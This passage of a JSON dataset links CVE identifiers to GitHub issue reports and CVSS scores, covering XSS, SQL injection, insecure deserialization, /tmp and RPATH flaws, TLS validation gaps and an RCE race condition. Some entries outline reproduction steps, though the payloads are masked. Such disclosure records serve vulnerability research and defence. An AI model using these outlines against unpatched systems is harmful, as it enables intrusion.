Greetings!",
  22. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23. "severity": "MEDIUM",
  24. "baseScore": 6.1,
  25. "impactScore": 2.7,
  26. "exploitabilityScore": 2.8
  27. },
  28. {
  29. "CVE_ID": "CVE-2013-7447",
  30. "Issue_Url_old": "https://github.com/mate-desktop/eom/issues/93",
  31. "Issue_Url_new": "https://github.com/mate-desktop/eom/issues/93",
  32. "Repo_new": "mate-desktop/eom",
  33. "Issue_Created_At": "2015-07-26T22:46:13Z",
  34. "description": "EOM crashes when trying to open a large PNG file. Hello, I would like to report a bug concerning EOM version NUMBERTAG When trying to open a large PNG file NUMBERTAG p NUMBERTAG px) EOM crashes. Environment: Debian NUMBERTAG EOM NUMBERTAG I've been able to catch a backtrace using gdb: APITAG received signal SIGSEGV, Segmentation fault. APITAG to Thread NUMBERTAG fd NUMBERTAG LWP NUMBERTAG fd NUMBERTAG fc NUMBERTAG f0 in APITAG () from PATHTAG (gdb) bt NUMBERTAG fd NUMBERTAG fc NUMBERTAG f0 in APITAG () from PATHTAG NUMBERTAG in eom_thumbnail_load NUMBERTAG in NUMBERTAG b1 in NUMBERTAG fd NUMBERTAG ca NUMBERTAG in g_thread_proxy (data NUMBERTAG bf NUMBERTAG at PATHTAG NUMBERTAG fd NUMBERTAG b NUMBERTAG a0a4 in start_thread (arg NUMBERTAG fd NUMBERTAG at APITAG NUMBERTAG fd NUMBERTAG b3cf NUMBERTAG d in clone () at PATHTAG Please let me know if you need the test file. Best regards",
  35. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36. "severity": "MEDIUM",
  37. "baseScore": 6.5,
  38. "impactScore": 3.6,
  39. "exploitabilityScore": 2.8
  40. },
  41. {
  42. "CVE_ID": "CVE-2013-7458",
  43. "Issue_Url_old": "https://github.com/antirez/redis/issues/3284",
  44. "Issue_Url_new": "https://github.com/redis/redis/issues/3284",
  45. "Repo_new": "redis/redis",
  46. "Issue_Created_At": "2016-05-30T15:35:38Z",
  47. "description": "redis cli: permissions when opening history file. redis cli saves it's history here: URLTAG and uses the linenoise library to fopen the file there: URLTAG If the file does not exist, it's created with default umask NUMBERTAG so the file ends up with NUMBERTAG redis cli writes it's history to APITAG by default, which usually expands to a folder in /home, which is world accessible by default in a lot of distributions. This causes the file to be world readable. You could either call umask to change the default permissions or pass appropriate permissions when creating, like bash does: APITAG URLTAG",
  48. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  49. "severity": "LOW",
  50. "baseScore": 3.3,
  51. "impactScore": 1.4,
  52. "exploitabilityScore": 1.8
  53. },
  54. {
  55. "CVE_ID": "CVE-2013-7458",
  56. "Issue_Url_old": "https://github.com/antirez/linenoise/issues/121",
  57. "Issue_Url_new": "https://github.com/antirez/linenoise/issues/121",
  58. "Repo_new": "antirez/linenoise",
  59. "Issue_Created_At": "2016-06-18T01:24:57Z",
  60. "description": "Function to save history as private file by default. Add a function that guarantees no group nor world access when creating a new history file, but do not change the current file permission.",
  61. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  62. "severity": "LOW",
  63. "baseScore": 3.3,
  64. "impactScore": 1.4,
  65. "exploitabilityScore": 1.8
  66. },
  67. {
  68. "CVE_ID": "CVE-2013-7459",
  69. "Issue_Url_old": "https://github.com/dlitz/pycrypto/issues/176",
  70. "Issue_Url_new": "https://github.com/pycrypto/pycrypto/issues/176",
  71. "Repo_new": "pycrypto/pycrypto",
  72. "Issue_Created_At": "2015-12-14T23:33:48Z",
  73. "description": "AES.new with invalid parameter crashes python. In Crypto NUMBERTAG and Python NUMBERTAG and NUMBERTAG folowing code causes crash: from APITAG import AES APITAG NUMBERTAG APITAG b NUMBERTAG",
  74. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75. "severity": "CRITICAL",
  76. "baseScore": 9.8,
  77. "impactScore": 5.9,
  78. "exploitabilityScore": 3.9
  79. },
  80. {
  81. "CVE_ID": "CVE-2013-7489",
  82. "Issue_Url_old": "https://github.com/bbangert/beaker/issues/191",
  83. "Issue_Url_new": "https://github.com/bbangert/beaker/issues/191",
  84. "Repo_new": "bbangert/beaker",
  85. "Issue_Created_At": "2020-05-14T18:02:40Z",
  86. "description": "Insecure data serialization method by default with pickle on Cache. Hello, Beaker uses Pickle on Session and Cache. On Session at least it has support to secret/HMAC but on caching it doesn't which can lead to arbitrary code execution. URLTAG Maybe it would be wise to expose data_serializer in Cache too and maybe even allow a secret definition for caching. What do you think?",
  87. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  88. "severity": "MEDIUM",
  89. "baseScore": 6.8,
  90. "impactScore": 5.9,
  91. "exploitabilityScore": 0.9
  92. },
  93. {
  94. "CVE_ID": "CVE-2014-0087",
  95. "Issue_Url_old": "https://github.com/ManageIQ/manageiq/issues/1581",
  96. "Issue_Url_new": "https://github.com/manageiq/manageiq/issues/1581",
  97. "Repo_new": "manageiq/manageiq",
  98. "Issue_Created_At": "2015-02-05T08:32:09Z",
  99. "description": "Hardening of the RBAC check. The current code in APITAG that does RBAC checking is: CODETAG Meaning that if we do not find particular RBAC feature, we just validate the existence of a route and let the request in. The routes are whitelisted in the route file and effort was put into making sure that we have all the features defined. Right now I don't see an exploit for this as there would have to be extra route for this to an action what does not have RBAC feature and check defined. However for a developer it's easy to forget and expose something this way. Therefor we shoud we should change the code to: CODETAG and fix or change whatever is needed to be done to make everything work as before from the user perspective.",
  100. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  101. "severity": "HIGH",
  102. "baseScore": 8.8,
  103. "impactScore": 5.9,
  104. "exploitabilityScore": 2.8
  105. },
  106. {
  107. "CVE_ID": "CVE-2014-5002",
  108. "Issue_Url_old": "https://github.com/panthomakos/lynx/issues/3",
  109. "Issue_Url_new": "https://github.com/panthomakos/lynx/issues/3",
  110. "Repo_new": "panthomakos/lynx",
  111. "Issue_Created_At": "2018-01-12T00:12:50Z",
  112. "description": "CVE: APITAG password exposed on the command line. CVETAG",
  113. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  114. "severity": "HIGH",
  115. "baseScore": 7.8,
  116. "impactScore": 5.9,
  117. "exploitabilityScore": 1.8
  118. },
  119. {
  120. "CVE_ID": "CVE-2014-7919",
  121. "Issue_Url_old": "https://github.com/alexpark07/Bookmark/issues/1",
  122. "Issue_Url_new": "https://github.com/alexpark07/bookmark/issues/1",
  123. "Repo_new": "alexpark07/bookmark",
  124. "Issue_Created_At": "2016-07-12T17:28:56Z",
  125. "description": "can you match up one of your disclosures?. FILETAG CVETAG can you match this to a commit or Android Bug ID? Thanks!",
  126. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  127. "severity": "HIGH",
  128. "baseScore": 7.5,
  129. "impactScore": 3.6,
  130. "exploitabilityScore": 3.9
  131. },
  132. {
  133. "CVE_ID": "CVE-2014-8184",
  134. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/425",
  135. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/425",
  136. "Repo_new": "liblouis/liblouis",
  137. "Issue_Created_At": "2017-10-16T12:12:12Z",
  138. "description": "stack based buffer overflow ( CVETAG ). Hello, Do you have any commit for this issue? References: CVETAG CVETAG Thanks in advance!",
  139. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  140. "severity": "HIGH",
  141. "baseScore": 7.8,
  142. "impactScore": 5.9,
  143. "exploitabilityScore": 1.8
  144. },
  145. {
  146. "CVE_ID": "CVE-2014-9515",
  147. "Issue_Url_old": "https://github.com/DozerMapper/dozer/issues/410",
  148. "Issue_Url_new": "https://github.com/dozermapper/dozer/issues/410",
  149. "Repo_new": "dozermapper/dozer",
  150. "Issue_Created_At": "2017-05-29T20:08:26Z",
  151. "description": "Update references of package names to APITAG As we are releasing under the APITAG group id, the packages should also match.",
  152. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  153. "severity": "CRITICAL",
  154. "baseScore": 9.8,
  155. "impactScore": 5.9,
  156. "exploitabilityScore": 3.9
  157. },
  158. {
  159. "CVE_ID": "CVE-2014-9515",
  160. "Issue_Url_old": "https://github.com/DozerMapper/dozer/issues/786",
  161. "Issue_Url_new": "https://github.com/dozermapper/dozer/issues/786",
  162. "Repo_new": "dozermapper/dozer",
  163. "Issue_Created_At": "2020-02-12T12:49:23Z",
  164. "description": "No indication if CVETAG is solved. Dozer NUMBERTAG has vulnerability CVETAG . I couldn't find any information about it in Dozer NUMBERTAG release notes and migration documents. It is either not fixed yet or the information is missing.",
  165. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  166. "severity": "CRITICAL",
  167. "baseScore": 9.8,
  168. "impactScore": 5.9,
  169. "exploitabilityScore": 3.9
  170. },
  171. {
  172. "CVE_ID": "CVE-2014-9748",
  173. "Issue_Url_old": "https://github.com/libuv/libuv/issues/515",
  174. "Issue_Url_new": "https://github.com/libuv/libuv/issues/515",
  175. "Repo_new": "libuv/libuv",
  176. "Issue_Created_At": "2015-09-07T13:02:14Z",
  177. "description": "windows: xp rwlock fallback is unsound. It was pointed out by Zhou Ran that the fallback write mutex can end up getting unlocked by a different thread than the one that locked it, resulting in undefined behavior. Consider a rwlock that is initially unlocked: Thread A: increments reader count at t0 > acquires write lock at t0 > decrements reader count at t2 Thread B: increments reader count at t1 > decrements reader count at t3 > releases write lock at t3 See also URLTAG",
  178. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  179. "severity": "HIGH",
  180. "baseScore": 8.1,
  181. "impactScore": 5.9,
  182. "exploitabilityScore": 2.2
  183. },
  184. {
  185. "CVE_ID": "CVE-2015-1378",
  186. "Issue_Url_old": "https://github.com/grml/grml-debootstrap/issues/59",
  187. "Issue_Url_new": "https://github.com/grml/grml-debootstrap/issues/59",
  188. "Repo_new": "grml/grml-debootstrap",
  189. "Issue_Created_At": "2015-01-20T15:49:50Z",
  190. "description": "Git HEAD: . The current code is sourcing APITAG from the directory that grml debootstrap is executed from: ERRORTAG To demonstrate it: APITAG Before sourcing that file, grml debootstrap should check if the current working directory is writable to non root users and deny sourcing if so.",
  191. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  192. "severity": "HIGH",
  193. "baseScore": 7.5,
  194. "impactScore": 3.6,
  195. "exploitabilityScore": 3.9
  196. },
  197. {
  198. "CVE_ID": "CVE-2015-1590",
  199. "Issue_Url_old": "https://github.com/kamailio/kamailio/issues/48",
  200. "Issue_Url_new": "https://github.com/kamailio/kamailio/issues/48",
  201. "Repo_new": "kamailio/kamailio",
  202. "Issue_Created_At": "2015-01-20T09:46:30Z",
  203. "description": "multiple /tmp file vulnerabilities. Reported by: Helmut Grohne APITAG The kamailio package now installs PATHTAG which can be selected via the CFGFILE= setting in PATHTAG The configuration contains: APITAG This setting is insecure and may allow local users to elevate privileges to the kamailio user. The issue extends to kamailio APITAG It seems that this is due to an incomplete fix of NUMBERTAG Looking further, the state of /tmp file vulnerabilities in kamailio looks worrisome. Most of the results of the following command (to be executed in the kamailio source) are likely vulnerable if executed: APITAG Granted, some of the results are examples, documentation or obsolete. But quite a few reach the default settings: kamcmd defaults to connecting to PATHTAG The kamailio build definitely is vulnerable as can be seen in PATHTAG More research clearly is required here. Given these findings, the security team may want to veto the inclusion of kamailio in a stable release, which would be very unfortunate as kamailio is quite a unique piece of software with little competitors in its field. Helmut CVETAG",
  204. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  205. "severity": "HIGH",
  206. "baseScore": 7.8,
  207. "impactScore": 5.9,
  208. "exploitabilityScore": 1.8
  209. },
  210. {
  211. "CVE_ID": "CVE-2015-1820",
  212. "Issue_Url_old": "https://github.com/rest-client/rest-client/issues/369",
  213. "Issue_Url_new": "https://github.com/rest-client/rest-client/issues/369",
  214. "Repo_new": "rest-client/rest-client",
  215. "Issue_Created_At": "2015-03-24T02:47:54Z",
  216. "description": "CVETAG : rest client passes values from Set Cookie headers to arbitrary redirection target. When Ruby rest client NUMBERTAG processes an HTTP redirection response, it blindly passes along the values from any Set Cookie headers to the redirection target, regardless of domain, path, or expiration. This is very similar to CVETAG , which affected python requests. URLTAG The issue could be similarly exploited in the following ways: If you are the redirection source (i.e. you can make rest client hit your URL), you can make rest client perform a request to any third party domain with cookies of your choosing. This may be useful in performing a session fixation attack. If you are the redirection target (i.e. you can make a third party site redirect to your URL), you can steal any cookies set by the third party redirection. The behavior was introduced in rest client NUMBERTAG by this commit: URLTAG All subsequently released NUMBERTAG and NUMBERTAG ersions are affected. This issue is expected to be fixed in a forthcoming rest client NUMBERTAG release.",
  217. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  218. "severity": "CRITICAL",
  219. "baseScore": 9.8,
  220. "impactScore": 5.9,
  221. "exploitabilityScore": 3.9
  222. },
  223. {
  224. "CVE_ID": "CVE-2015-1828",
  225. "Issue_Url_old": "https://github.com/ruby/openssl/issues/8",
  226. "Issue_Url_new": "https://github.com/ruby/openssl/issues/8",
  227. "Repo_new": "ruby/openssl",
  228. "Issue_Created_At": "2015-03-24T22:27:01Z",
  229. "description": "Subject is not ensured to be verified even when APITAG is configured. Even if APITAG is configured, I/O is allowed with a remote server before the subject has been verified. VERIFY_PEER only checks the cert chain is rooted in the local truststore. It does not check if the subject is valid in and of itself. My understanding is the APITAG method must be called to ensure the subject is correctly verified. However, communication is allowed to remote services without verifying the subject. I would suggest throwing an exception if VERIFY_PEER is configured and I/O is attempted without first calling APITAG It would also be nice if this all happened automatically simply by passing hostname into APITAG (which AFAICT only affects SNI presently, and not subject verification)",
  230. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  231. "severity": "MEDIUM",
  232. "baseScore": 5.9,
  233. "impactScore": 3.6,
  234. "exploitabilityScore": 2.2
  235. },
  236. {
  237. "CVE_ID": "CVE-2015-20001",
  238. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/25842",
  239. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/25842",
  240. "Repo_new": "rust-lang/rust",
  241. "Issue_Created_At": "2015-05-27T22:07:40Z",
  242. "description": "APITAG is not exception safe. APITAG is using APITAG and may not be exception safe. I.e. it is in an inconsistent state after being recovered after panic. See issue NUMBERTAG and others. Relevant code is APITAG sift_down_range URLTAG cc MENTIONTAG",
  243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  244. "severity": "HIGH",
  245. "baseScore": 7.5,
  246. "impactScore": 3.6,
  247. "exploitabilityScore": 3.9
  248. },
  249. {
  250. "CVE_ID": "CVE-2015-2142",
  251. "Issue_Url_old": "https://github.com/a-v-k/phpBugTracker/issues/4",
  252. "Issue_Url_new": "https://github.com/a-v-k/phpbugtracker/issues/4",
  253. "Repo_new": "a-v-k/phpbugtracker",
  254. "Issue_Created_At": "2015-02-05T16:29:35Z",
  255. "description": "Multiple SQL injection , reflecting/stored XSS and CSRF vulnerabilities in APITAG NUMBERTAG Dear development team. I found multiple SQL injection , reflecting/stored XSS and CSRF vulnerabilities in your product APITAG NUMBERTAG Please provide me an email address where I can send the technical details to. Otherwise, if you don't mind, I can post them directly on Github. I have released a security advisory without technical details here: URLTAG If you don't respond until NUMBERTAG th February NUMBERTAG UTC NUMBERTAG I will as well release the technical details of these issues and send the vulnerabilities to the security mailing list APITAG to warn people. Thank you for your attention. Greetings from Germany. Steffen R\u00f6semann",
  256. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  257. "severity": "HIGH",
  258. "baseScore": 8.0,
  259. "impactScore": 5.9,
  260. "exploitabilityScore": 2.1
  261. },
  262. {
  263. "CVE_ID": "CVE-2015-2674",
  264. "Issue_Url_old": "https://github.com/benoitc/restkit/issues/140",
  265. "Issue_Url_new": "https://github.com/benoitc/restkit/issues/140",
  266. "Repo_new": "benoitc/restkit",
  267. "Issue_Created_At": "2015-03-12T14:34:18Z",
  268. "description": "Doesn't Validate TLS. Restkit does not validate TLS which means it's HTTPS handling is broken and insecure. ERRORTAG",
  269. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  270. "severity": "MEDIUM",
  271. "baseScore": 5.9,
  272. "impactScore": 3.6,
  273. "exploitabilityScore": 2.2
  274. },
  275. {
  276. "CVE_ID": "CVE-2015-2796",
  277. "Issue_Url_old": "https://github.com/Project-Pier/ProjectPier-Core/issues/37",
  278. "Issue_Url_new": "https://github.com/project-pier/projectpier-core/issues/37",
  279. "Repo_new": "project-pier/projectpier-core",
  280. "Issue_Created_At": "2015-03-31T14:18:33Z",
  281. "description": "Security Issue XSS CVETAG . An attacker can pass this URL (with XSS payload) to a victim (user of APITAG and can make the victim to perform some tasks or can infect the user. The vulnerability is XSS URLTAG The search_for parameter is not getting sanitized. You can use CVETAG cve id in your announcements when you fix this vulnerability. Thanks, Jaydeep",
  282. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  283. "severity": "MEDIUM",
  284. "baseScore": 6.1,
  285. "impactScore": 2.7,
  286. "exploitabilityScore": 2.8
  287. },
  288. {
  289. "CVE_ID": "CVE-2015-2912",
  290. "Issue_Url_old": "https://github.com/orientechnologies/orientdb/issues/4824",
  291. "Issue_Url_new": "https://github.com/orientechnologies/orientdb/issues/4824",
  292. "Repo_new": "orientechnologies/orientdb",
  293. "Issue_Created_At": "2015-08-19T21:38:03Z",
  294. "description": "Cross Site Request Forgery. The APITAG Server allows the usage of a parameter for the name of a callback function in http requests. If such a parameter is used in a http request the server sends the http response to the function which is specified in the parameter. This can be used to construct a malicious webpage which sends a get request to the APITAG server in order to get some content. An attacker can read the http response, because of the allowed callback function parameter. The APITAG server provides an interface to request specific entries of a database with the http method GET. For example the URL URLTAG response with JSON data of the record NUMBERTAG In the case of record NUMBERTAG its the information about the reader account with the hashed password. CODETAG",
  295. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  296. "severity": "HIGH",
  297. "baseScore": 8.8,
  298. "impactScore": 5.9,
  299. "exploitabilityScore": 2.8
  300. },
  301. {
  302. "CVE_ID": "CVE-2015-3138",
  303. "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpdump/issues/446",
  304. "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpdump/issues/446",
  305. "Repo_new": "the-tcpdump-group/tcpdump",
  306. "Issue_Created_At": "2015-03-25T18:10:04Z",
  307. "description": "Possible heap overflows reading pcap. Hello, In learning how to use american fuzzy lop, I decided to make libpcap/tcpdump my first fuzzing foray. I was able to find two possible heap overflows in print wb.c (lines NUMBERTAG and NUMBERTAG Loading tcpdump NUMBERTAG in gdb and running the two testcases that consistently segfault: gdb PATHTAG CODETAG And... CODETAG What would be the best way to get the testcases to you that cause the crashes? Thanks!",
  308. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  309. "severity": "HIGH",
  310. "baseScore": 7.5,
  311. "impactScore": 3.6,
  312. "exploitabilityScore": 3.9
  313. },
  314. {
  315. "CVE_ID": "CVE-2015-3172",
  316. "Issue_Url_old": "https://github.com/jkk/eidogo/issues/27",
  317. "Issue_Url_new": "https://github.com/jkk/eidogo/issues/27",
  318. "Repo_new": "jkk/eidogo",
  319. "Issue_Created_At": "2015-06-14T20:15:36Z",
  320. "description": "XSS Security Vulnerability. APITAG is susceptible to Cross Site Scripting (XSS) attacks via maliciously crafted SGF input. There are actually two separate XSS vulnerabilities NUMBERTAG Text from comments and game info are unsafely added into the DOM directly via APITAG NUMBERTAG Any file loaded from URL that begins with a left curly bracket \"{\" is assumed to be JSON and unsafely parsed with eval. Here are examples exploiting each vulnerability: URLTAG URLTAG A patch attempting to mitigate these security vulnerabilities was submitted in this pull request: URLTAG See this pull request for more discussion of the changes. Note that the pull request does not include an updated minified file. However, a minified file incorporating this patch has been prepared by the OGS developers and is available here: FILETAG Compare with: FILETAG The identifier \" CVETAG \" has been assigned to refer to this issue. Disclosure timeline: April NUMBERTAG Developer privately notified of security vulnerability April NUMBERTAG Developer acknowledged notification May NUMBERTAG Pull request submitted May NUMBERTAG Several webmasters notified in advance June NUMBERTAG Public disclosure",
  321. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  322. "severity": "MEDIUM",
  323. "baseScore": 5.4,
  324. "impactScore": 2.7,
  325. "exploitabilityScore": 2.3
  326. },
  327. {
  328. "CVE_ID": "CVE-2015-3400",
  329. "Issue_Url_old": "https://github.com/zfsonlinux/zfs/issues/3319",
  330. "Issue_Url_new": "https://github.com/openzfs/zfs/issues/3319",
  331. "Repo_new": "openzfs/zfs",
  332. "Issue_Created_At": "2015-04-19T16:15:47Z",
  333. "description": "security issue: sharenfs always gives read access for world. Since NUMBERTAG sharenfs always gives read access to everyone. root APITAG zfs set APITAG PATHTAG root APITAG grep test_nfs PATHTAG PATHTAG APITAG PATHTAG APITAG root APITAG zfs set APITAG PATHTAG root APITAG grep test_nfs PATHTAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG",
  334. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  335. "severity": "MEDIUM",
  336. "baseScore": 4.3,
  337. "impactScore": 1.4,
  338. "exploitabilityScore": 2.8
  339. },
  340. {
  341. "CVE_ID": "CVE-2015-3886",
  342. "Issue_Url_old": "https://github.com/gobby/gobby/issues/61",
  343. "Issue_Url_new": "https://github.com/gobby/gobby/issues/61",
  344. "Repo_new": "gobby/gobby",
  345. "Issue_Created_At": "2015-05-06T22:05:38Z",
  346. "description": "Gobby seems to silently accept expired certificates. Debian bug NUMBERTAG CVETAG reported that gobby silently accepts expired certificates. The mentioned site has since been fixed and I'm unsure if that'd be due to pinning or if there's a genuine validation error. APITAG then the function in libinfinity doesn't seem to tolerate expiry not even with pinning AFAICS.) The report in full: > At the moment the certificate of APITAG is expired (reported > separately as Bug NUMBERTAG but Jessie's gobby happily establishes a full > connection to it without any warning. This is a regression since Wheezy, > since it's not the case in gobby NUMBERTAG ersion NUMBERTAG which shows a > warning stating that the certificate has expired with the option to > accept it any way. > > It's strange (and perhaps relevant), but if one configures an empty file > as the APITAG CAs\" file in Jessie's gobby's security options, then > it lists the connection with a \"certificate expired\" error next to it in > the Document Browser pane. However, no prompt is shown, so it's not > possible to manually accept the expired certificate.",
  347. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  348. "severity": "CRITICAL",
  349. "baseScore": 9.8,
  350. "impactScore": 5.9,
  351. "exploitabilityScore": 3.9
  352. },
  353. {
  354. "CVE_ID": "CVE-2015-3887",
  355. "Issue_Url_old": "https://github.com/rofl0r/proxychains-ng/issues/60",
  356. "Issue_Url_new": "https://github.com/rofl0r/proxychains-ng/issues/60",
  357. "Repo_new": "rofl0r/proxychains-ng",
  358. "Issue_Created_At": "2015-05-13T23:10:26Z",
  359. "description": "CVETAG RPATH flaw. URLTAG This line loads libproxychains4.so from the current directory which can be used by the attacker to load a manipulated library instead of original libproxychains4.so ref: CVETAG URLTAG URLTAG",
  360. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  361. "severity": "HIGH",
  362. "baseScore": 7.8,
  363. "impactScore": 5.9,
  364. "exploitabilityScore": 1.8
  365. },
  366. {
  367. "CVE_ID": "CVE-2015-4082",
  368. "Issue_Url_old": "https://github.com/jborg/attic/issues/271",
  369. "Issue_Url_new": "https://github.com/jborg/attic/issues/271",
  370. "Repo_new": "jborg/attic",
  371. "Issue_Created_At": "2015-04-05T11:10:31Z",
  372. "description": "potential decryption attack. assume attacker has access to your (still) encrypted repository and changes the manifest type byte to \"unencrypted / without key file\". your next automated backup will then run in unencrypted mode without you noticing it and you give all your data to the attacker who controls your backup device.",
  373. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  374. "severity": "MEDIUM",
  375. "baseScore": 6.5,
  376. "impactScore": 3.6,
  377. "exploitabilityScore": 2.8
  378. },
  379. {
  380. "CVE_ID": "CVE-2015-4627",
  381. "Issue_Url_old": "https://github.com/delta/pragyan/issues/207",
  382. "Issue_Url_new": "https://github.com/delta/pragyan/issues/207",
  383. "Repo_new": "delta/pragyan",
  384. "Issue_Created_At": "2015-06-17T03:57:25Z",
  385. "description": "SQL injection vulnerability in Lastest version Pragyan CMS NUMBERTAG Dear developer team. We are a information security team from QIHU NUMBERTAG company, China. We found a SQL injection vulnerability in lastest version Pragyan CMS NUMBERTAG and already sent you the technical details to EMAILTAG . Thank you APITAG info] name: APITAG company: QIHU NUMBERTAG company, China email: g sec EMAILTAG",
  386. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  387. "severity": "CRITICAL",
  388. "baseScore": 9.8,
  389. "impactScore": 5.9,
  390. "exploitabilityScore": 3.9
  391. },
  392. {
  393. "CVE_ID": "CVE-2015-5060",
  394. "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/875",
  395. "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/875",
  396. "Repo_new": "anchorcms/anchor-cms",
  397. "Issue_Created_At": "2015-06-24T17:43:45Z",
  398. "description": "DOM Based XSS attack through Search option. Hello all, The search option of the anchor CMS is properly escaped but an attacker can directly inject an XSS payload on the URL and it will execute properly. This happens in the most recent version of anchor CMS available to download from the FILETAG i.e.version NUMBERTAG The simple payload looks like this: URLTAG FILETAG",
  399. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  400. "severity": "MEDIUM",
  401. "baseScore": 6.1,
  402. "impactScore": 2.7,
  403. "exploitabilityScore": 2.8
  404. },
  405. {
  406. "CVE_ID": "CVE-2015-5237",
  407. "Issue_Url_old": "https://github.com/google/protobuf/issues/760",
  408. "Issue_Url_new": "https://github.com/protocolbuffers/protobuf/issues/760",
  409. "Repo_new": "protocolbuffers/protobuf",
  410. "Issue_Created_At": "2015-08-27T08:52:31Z",
  411. "description": "CVETAG : Integer overflow in serialization. int is used to express the size of serialized messages. If the size exceeds NUMBERTAG APITAG the application may allocate a buffer which is too small, or protobuf itself does this, in APITAG . It has been suggested that serialization of messages larger than NUMBERTAG APITAG is unsupported. But there is no good way for an application to ensure that the limit is not exceeded accidentally, without imposing rather draconian limits. To some degree, this is an gets style interface. Right now, this is more or less harmless because the message sizes involved are substantial. But this will change over time. My worry is that it will be difficult to fix this because some of the overflowing computations end up in generated APITAG files, so the eventual fix will not be a simple library update.",
  412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  413. "severity": "HIGH",
  414. "baseScore": 8.8,
  415. "impactScore": 5.9,
  416. "exploitabilityScore": 2.8
  417. },
  418. {
  419. "CVE_ID": "CVE-2015-5521",
  420. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/408",
  421. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/408",
  422. "Repo_new": "blackcatdevelopment/blackcatcms",
  423. "Issue_Created_At": "2021-04-19T19:03:53Z",
  424. "description": "XSS Vulnerability on Modify Group Page. Summary An authenticated malicious user can take advantage of a XSS vulnerability in the APITAG Group\" feature in Admin Steps to Reproduce: Login into the Admin panel Go to PATHTAG Add group with name '\"> APITAG APITAG ' Save group. Impact Cookie Stealing A malicious user can steal cookies and use them to gain access to the application. Arbitrary requests An attacker can use XSS to send requests that appear to be from the victim to the web server. Malware download XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the site, the user may be more likely to trust the request and actually install the malware. Defacement attacker can deface the website using javascript code.",
  425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  426. "severity": "MEDIUM",
  427. "baseScore": 4.8,
  428. "impactScore": 2.7,
  429. "exploitabilityScore": 1.7
  430. },
  431. {
  432. "CVE_ID": "CVE-2015-5947",
  433. "Issue_Url_old": "https://github.com/salesagility/SuiteCRM/issues/333",
  434. "Issue_Url_new": "https://github.com/salesagility/suitecrm/issues/333",
  435. "Repo_new": "salesagility/suitecrm",
  436. "Issue_Created_At": "2015-08-05T19:30:34Z",
  437. "description": "Post Auth RCE Not Fixed, its now a race condition :). The Post Auth RCE allegedly \"fixed\" in Commit b1b3fd6 URLTAG is not fixed. The fix simply makes the bug slightly harder to exploit, turning it from a straight shot file upload bug into a lovely race condition. Also, I bypassed the blacklist again :) Video Proof below, a APITAG will be published along with a full writeup of the vulnerability in due course, and a CVE will be requested from MITRE. ![IMAGE ALT TEXT HERE URLTAG Suggested fix: Validate images BEFORE writing to disc. Writing them to disc, then checking them, is a bad idea.",
  438. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
